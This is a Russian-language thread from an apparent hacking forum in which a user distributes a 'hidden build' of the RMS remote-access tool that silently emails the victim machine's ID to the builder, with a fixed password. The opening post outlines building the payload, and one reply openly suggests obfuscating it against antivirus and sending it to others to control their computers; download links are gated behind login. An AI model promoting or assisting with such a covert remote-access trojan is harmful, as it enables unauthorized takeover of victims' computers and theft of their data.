Скрытая сборка RMS 6.3.0.6 с отправкой ID на почту

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time
Статус
В этой теме нельзя размещать новые ответы.

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
Скрытая сборка RMS (remote manipulator system) 6.3.0.6 с отправкой ID на почту , пароль всегда 12345.
Все что нужно - создать reg файл в программе RG.exe, в программе вводим почту и создаётся reg файл реестра его переносим в архив сервера Build.exe (не папку!)

1454451478_bezymddyannyy.png
1454451454_arh.png
1454473122_1454451454_pap.png

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
 

SUPPORT_388945a0

Участник

SUPPORT_388945a0

Участник
6 Фев 2016
49
10
Я ничего не понял в описании. В чём заключается функционал программы? Только лишь в отправке какого-то ID на почту ? Что это за ID? ID чего ?
Для чего нужен рег-файл и зачем его создавать в какой-то отдельнеой программе ?
На мой взгляд, в описании - пустой набор предложений.
 

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
Я ничего не понял в описании. В чём заключается функционал программы? Только лишь в отправке какого-то ID на почту ? Что это за ID? ID чего ?
Для чего нужен рег-файл и зачем его создавать в какой-то отдельнеой программе ?
На мой взгляд, в описании - пустой набор предложений.
Зачем писать что то если ты не знаешь для чего нужен id и удалённое управление в общем? Гугли remote manipulator system
 

SUPPORT_388945a0

Участник

SUPPORT_388945a0

Участник
6 Фев 2016
49
10
Неужели моя запись так испортила форум ?
Что такое remote manipulator system (RMS) - я знаю. Непонятно, каким функционалом обладает эта софтина.
 

Руслан

Участник

Руслан

Участник
25 Янв 2016
8
3
Допустим запустил файл Build.exe к тебе на почту приходит айди твоего компа, где ты можеш подключиться и управлять по удалённому доступу компьютером, или заскриптуй чтоб вирсняк не палил и отправляй кому нибудь, потом подключаешься к компьютеру кому отправил и делаёш с ним что хочеш как то так:D
 

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
Неужели моя запись так испортила форум ?
Что такое remote manipulator system (RMS) - я знаю. Непонятно, каким функционалом обладает эта софтина.
Так тема не о функционале, а о том как создать скрытую сборку с отправкой id на почту.
 

SUPPORT_388945a0

Участник

SUPPORT_388945a0

Участник
6 Фев 2016
49
10
Допустим запустил файл Build.exe к тебе на почту приходит айди твоего компа, где ты можеш подключиться и управлять по удалённому доступу компьютером, или заскриптуй чтоб вирсняк не палил и отправляй кому нибудь, потом подключаешься к компьютеру кому отправил и делаёш с ним что хочеш как то так:D
Да зачем ты эту азбуку пишешь ? Ты почитай описание программы. Я про описание программы пишу.
 

Spais

Участник

Spais

Участник
16 Фев 2016
13
0
Так тема не о функционале, а о том как создать скрытую сборку с отправкой id на почту.
можно сылку на скачивание а ту я перехожу по сылке и ошибка выходит или перезалейте сылку пожалуйста!!!
 

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316

Spais

Участник

Spais

Участник
16 Фев 2016
13
0

Mr.Aero

Гость
M

Mr.Aero

Гость
Реально, залей на ргхост с паролем или на sendspace
Тоже не качает
 

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
Реально, залей на ргхост с паролем или на sendspace
можно сылку на скачивание а ту я перехожу по сылке и ошибка выходит или перезалейте сылку пожалуйста!!!
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
 
Статус
В этой теме нельзя размещать новые ответы.

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя